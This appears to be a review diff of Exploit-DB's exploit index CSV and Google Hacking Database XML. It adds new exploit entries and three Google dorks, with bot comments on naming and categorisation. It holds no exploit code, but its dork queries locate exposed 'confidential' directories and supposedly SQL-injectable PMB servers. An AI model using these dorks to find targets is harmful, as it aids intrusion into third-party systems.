40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,,
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,,2018-07-09,2018-07-09,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgitlist-0.6.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/545e91af0077d1039b0f861346aada45fdfdf10e/modules/exploits/multi/http/gitlist_arg_injection.rb
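Review bot: 51812 and 51813 are SQL injections in PHP web applications but are filed under exploits/php/remote with type "remote", a directory whose neighbours here are Metasploit remote modules; the other two SQLi entries in this same commit (51810 taskhub, 51811 Online Shopping System) go under exploits/php/webapps with type "webapps". Pick one convention for the four.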
@ -13069,6 +13074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php,,2012-09-08,2012-09-08,1,OSVDB-83767,"Metasploit Framework (MSF)",,,,
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,,
51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,,
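Review bot: 51808 has the same placement question as 51812/51813: a PHP web-app SQL injection recorded as type "remote" under exploits/php/remote, while the taskhub and Online Shopping System entries from this commit are "webapps". Visible in the context lines, though not part of this change: id 24902 appears twice, the rows differing only in the tag column ("Metasploit Framework (MSF)" vs "Malware"), which any id-keyed consumer of this CSV will collapse to one row; worth a follow-up cleanup.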
@ -16112,6 +16118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54111/info
19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php,,2012-06-21,2012-06-21,0,OSVDB-83148;OSVDB-83147;OSVDB-83146,,,,http://www.exploit-db.comcommentics.zip,
2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php,,2006-10-24,,1,,,,,,
51809,exploits/php/webapps/51809.py,"comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset",2024-02-26,"Diaa Hanna",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,webapps,php,,2005-11-23,2013-07-03,1,,,,,,https://www.securityfocus.com/bid/15552/info
33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-11,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38184/info
36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49296/info
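Review bot: the codes column for 51809 is empty even though the file header states "CVE : CVE-2023-3244" (compare 51815, which carries CVE-2024-25736 in the same position); fill it in so the entry is searchable by CVE. The description's "< 1.2.0" also disagrees with the file's own "Version: <= 1.2.0" and the quoted NVD wording "up to and including 1.2.0"; "<= 1.2.0" is the accurate bound.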
@ -24905,6 +24912,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,,
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
51811,exploits/php/webapps/51811.txt,"Online Shopping System Advanced - Sql Injection",2024-02-26,"Furkan Gedik",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
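Review bot: the description "Online Shopping System Advanced - Sql Injection" lacks the version and parameter that the file header provides (Version: 1.0, parameter cm) and that the adjacent rows for the same application use ("Online shopping system advanced 1.0 - 'p' SQL Injection"); "Online Shopping System Advanced 1.0 - 'cm' SQL Injection" would sort and read consistently, and "SQL" is capitalised everywhere else in the column. Since 51103 already records "Multiple Vulnerabilities" for this application, confirm that the "cm" parameter is not among them before publishing a separate entry.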
@ -30546,6 +30554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
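Review bot: the 51810 row spells the product "taskhub" in lowercase while the adjacent rows use "Taskhub CRM Tool" (51692) and "TASKHUB" (51782); normalise to one product name so the three rows sort together and searches match all of them. The description also omits the injectable parameter and leaves the codes column empty, unlike the TaskFreak rows above it which carry CVE and OSVDB identifiers.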
@ -46237,6 +46246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe,
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,,2018-05-28,2018-05-28,0,,,,,,
44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,,2018-03-12,2018-03-12,0,CVE-2018-7756,,,,,
51817,exploits/windows_x86-64/remote/51817.txt,"IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft",2024-02-26,hyp3rlinx,remote,windows_x86-64,,2024-02-26,2024-02-26,0,CVE-2024-22318,,,,,
42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64,,2017-07-24,2017-07-26,0,CVE-2017-0059;CVE-2017-0037,,,,,https://redr2e.com/cve-to-exploit-cve-2017-0037-and-0059/
42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445,2017-05-19,2019-03-28,1,CVE-2017-0144,,EternalBlue,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2018-09-30-at-103641.png,,https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py
41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,,2017-05-10,2018-10-17,0,CVE-2017-0148;CVE-2017-0147;CVE-2017-0146;CVE-2017-0145;CVE-2017-0144;CVE-2017-0143,,,,,
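Review bot: the 51817 description "v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4" looks mangled: the underscore after "1.1.4" appears to stand in for a comma that was stripped for CSV safety, and using " - " inside the version range collides with the " - " that separates product from vulnerability type in every other row. Suggest a form such as "IBM i Access Client Solutions 1.1.2 to 1.1.4 / 1.1.4.3 to 1.1.9.4 - Remote Credential Theft" so the two ranges are unambiguous. The platform column says windows_x86-64 although nothing in the row ties the issue to 64-bit Windows; confirm that is intended rather than a default.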

View file

@ -41760,6 +41760,21 @@ Sagar Banwa
<date>2023-02-27</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>8420</id>
<link>https://www.exploit-db.com/ghdb/8420</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /confidential&quot;</shortDescription>
<textualDescription>Description-* intitle:&quot;Index of /confidential&quot;*
This google dork searches in the title of websites for the &quot;&quot;Index of
/confidential&quot;
</textualDescription>
<query>intitle:&quot;Index of /confidential&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /confidential&quot;</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Gautam Rawat</author>
</entry>
<entry>
<id>8039</id>
<link>https://www.exploit-db.com/ghdb/8039</link>
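Review bot: in the 8420 entry the textualDescription has a doubled quote entity (`&quot;&quot;Index of`) plus a "Description-*" prefix and trailing asterisks that read like leftover markdown; rendered, the text will show two quote characters before "Index of". Suggest a plain description such as `This dork searches page titles for "Index of /confidential", i.e. open directory listings of a folder named confidential.` The description should also say what such a listing exposes (the file names and, usually, the files themselves) so that the "Files Containing Juicy Info" category is justified by the text rather than implied.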
@ -51560,6 +51575,27 @@ Dxtroyer</textualDescription>
<date>2023-11-20</date>
<author>Sathish Kishore</author>
</entry>
<entry>
<id>8418</id>
<link>https://www.exploit-db.com/ghdb/8418</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</shortDescription>
<textualDescription>Google Dork:
inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;
Description:
Using this Google dork can help identify WordPress sites that have their
oEmbed API publicly accessible, which could potentially be useful for
various purposes such as content scraping, data analysis, or security
research. However, it's essential to use this information ethically and
responsibly, respecting the privacy and security of the websites you
interact with.</textualDescription>
<query>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Jeel Patel</author>
</entry>
<entry>
<id>4678</id>
<link>https://www.exploit-db.com/ghdb/4678</link>
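Review bot: the 8418 description never says what the matched endpoint returns, so the "Files Containing Juicy Info" category is not supported by the text as written; /wp-json/oembed/1.0/embed is a public WordPress REST endpoint by design, so a hit mostly confirms that a site runs WordPress rather than that anything is misconfigured. Suggest either stating what the oEmbed response carries (post title and author name, which is why the entry sits in this category) or moving the entry to a fingerprinting category, and dropping the "Google Dork:" / "Description:" labels, which duplicate the shortDescription and query elements.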
@ -116029,6 +116065,23 @@ Ahmad Al-Nounou
<date>2014-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>8419</id>
<link>https://www.exploit-db.com/ghdb/8419</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</shortDescription>
<textualDescription>The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of
CVEs
*&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)*
</textualDescription>
<query>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</query>
<querystring>https://www.google.com/search?q=&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Wallehazz</author>
</entry>
<entry>
<id>6161</id>
<link>https://www.exploit-db.com/ghdb/6161</link>
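Review bot: the 8419 description asserts that the matched PMB installations are "Mostly vulnerable to SQli and handful of CVEs" but cites no CVE identifier and no affected version, so the claim is unverifiable and the "Vulnerable Servers" category is not supported by the text. Suggest naming the affected PMB versions and at least one CVE, correcting "SQli" to "SQLi" and "The Dork Filters for" to plain prose, and dropping the asterisk-wrapped repeat of the query, which already appears in the `<query>` element.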